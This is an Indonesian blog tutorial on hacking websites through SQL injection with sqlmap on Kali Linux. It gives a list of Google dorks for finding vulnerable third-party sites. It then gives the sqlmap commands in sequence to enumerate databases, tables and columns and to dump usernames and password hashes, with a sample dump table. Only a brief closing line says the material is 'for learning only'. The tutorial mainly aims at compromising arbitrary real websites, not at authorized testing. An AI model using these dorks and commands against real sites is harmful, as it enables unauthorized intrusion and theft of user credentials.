Cara Hack Website dengan SQL injection Kali Linux, Hacked!

Cara Hack Website dengan SQL injection Kali Linux, Hacked!
Daftar Isi Artikel

Magelang1337.com - SQL Injection adalah salah satu cara hacking dimana seorang attacker bisa dengan mudah memasukkan perintah SQL lewat URL yang bisa dieksekusi oleh database. Kenapa bisa terjadi? adanya celah ini adalah variable yang kurang di filter, sehingga hacker bisa dengan mudah mendapatkan data seperti username & password dari website yang di targetkannya.

SQLMAP sendiri adalah sebuah alat penetrasi open source untuk menguji & mengotomatisasi proses deteksi lalu bisa mengeksploitasi kelemahan SQL injection dan mengambil alih server database. Jadi setelah kita mengetahui tentang kejelasan SQLi tersebut langsung saja praktekan Cara Hack Website dengan SQL injection Kali Linux.

Hack Website dengan SQL injection Kali Linux

Langkah awal yang harus kamu lakukan yakni mencari target website yang memiliki kerentanan sql injection dengan bisa memakai dork google/bing yang kami sediakan.
news_view.php?id= 
select_biblio.php?id= 
humor.php?id= 
aboutbook.php?id= 
fiche_spectacle.php?id= 
communique_detail.php?id= 
sem.php3?id= 
kategorie.php4?id= 
faq2.php?id= 
show_an.php?id= 
preview.php?id= 
loadpsb.php?id=  
opinions.php?id= 
spr.php?id= 
pages.php?id= 
announce.php?id= 
clanek.php4?id= 
participant.php?id= 
download.php?id= 
main.php?id= 
review.php?id= 
chappies.php?id= 
read.php?id= 
prod_detail.php?id= 
viewphoto.php?id= 
article.php?id= 
play_old.php?id= 
Untuk mendapatkan dork yang bagus, Kamu harus membuat ide sendiri. Nah bagaimana caranya? Kami sudah membuatkan artikel yang bisa kalian baca sebagai referensi. 


Kemudian pada terminal linux masukan perintah ini
sqlmap -u http://target.com/contoh.php?id=1 --dbs
Kamu dapat mengganti website target sesuai website yang sudah kamu dapatkan dari pencarian dork yang memiliki bug sql injection seperti diatas.

Selanjutnya tekan enter dan tunggu sampai sqlmap mendapat informasi database target biasanya akan memakan waktu tergantung juga dari koneksi yang kamu pakai, Sesudah itu nantinya kamu akan mendapatkan database target & langkah selanjutnya menampilkan tables database denga ketikan perintah.
sqlmap -u http://target.com/contoh.php?id=1 -D namadatabase --tables
Setelah itu tekan enter dan tunggu beberapa saat sampai sqlmap mendapatkan tables dari database website tersebut jika sudah maka akan tampil tables database website tersebut langkah selanjutnya kita jalankan perintah untuk mengetahui isi columns dari tables database tersebut dengan perintah 
sqlmap -u http://target.com/contoh.php?id=1 -D namadatabase -T namatables --columns
Tunggu sebentar sampai sqlmap tampil data columns dari tables database website tersebut setelah mendapatkan columns database, langkah terakhir kalian cuma perlu dump data columns itu dengan ketikan perintah.
sqlmap -u http://website-target.com/contoh.php?id=1 -D namadatabase -T namatables -C namacolumn,namacolumn2 --dump
Dan tunggu hingga sqlmap berhasil Dump data columns database website target setelah selesai maka kamu akan mendapatkan data web tersebut. kurang lebih seperti dibawah ini:
+--------------------------+----------------------------------+
| uname | Pass
+-------------------------+-----------------------------------+
| 210cf7aa5e2682c9c9d4511f88fe2789 | 8be3c943b1609fffbfc51aad666d0a04adf83c9d
+-------------------------+-----------------------------------+

Seperti yang sudah dijelaskan diatas, Jika ingin mendapatkan banyak website vuln. Kamu harus mencari ide dork. Share tentang Sql Injection Dengan SQLMAP Kali Linux hanya untuk pembelajaran dan mohon jangan di salahgunakan. Sekian Tutorial kali ini semoga bermanfaat.

★★★★

Silahkan Komentar dengan bahasa yang sopan :)

  1. Untuk membuat judul komentar, gunakan <i rel="h2">Judul Komentar</i>
  2. Untuk membuat kotak catatan, <i rel="quote">catatan</i>
  3. Untuk membuat teks stabilo, <i rel="mark">mark</i>
  4. Untuk membuat teks mono, <i rel="kbd">kbd</i>
  5. Untuk membuat kode singkat, <i rel="code">shorcode</i>
  6. Untuk membuat kode panjang, <i rel="pre"><i rel="code">potongan kode</i></i>
  7. Untuk membuat teks tebal, <strong>tebal</strong> atau <b>tebal</b>
  8. Untuk membuat teks miring, <em>miring</em> atau <i>miring</i>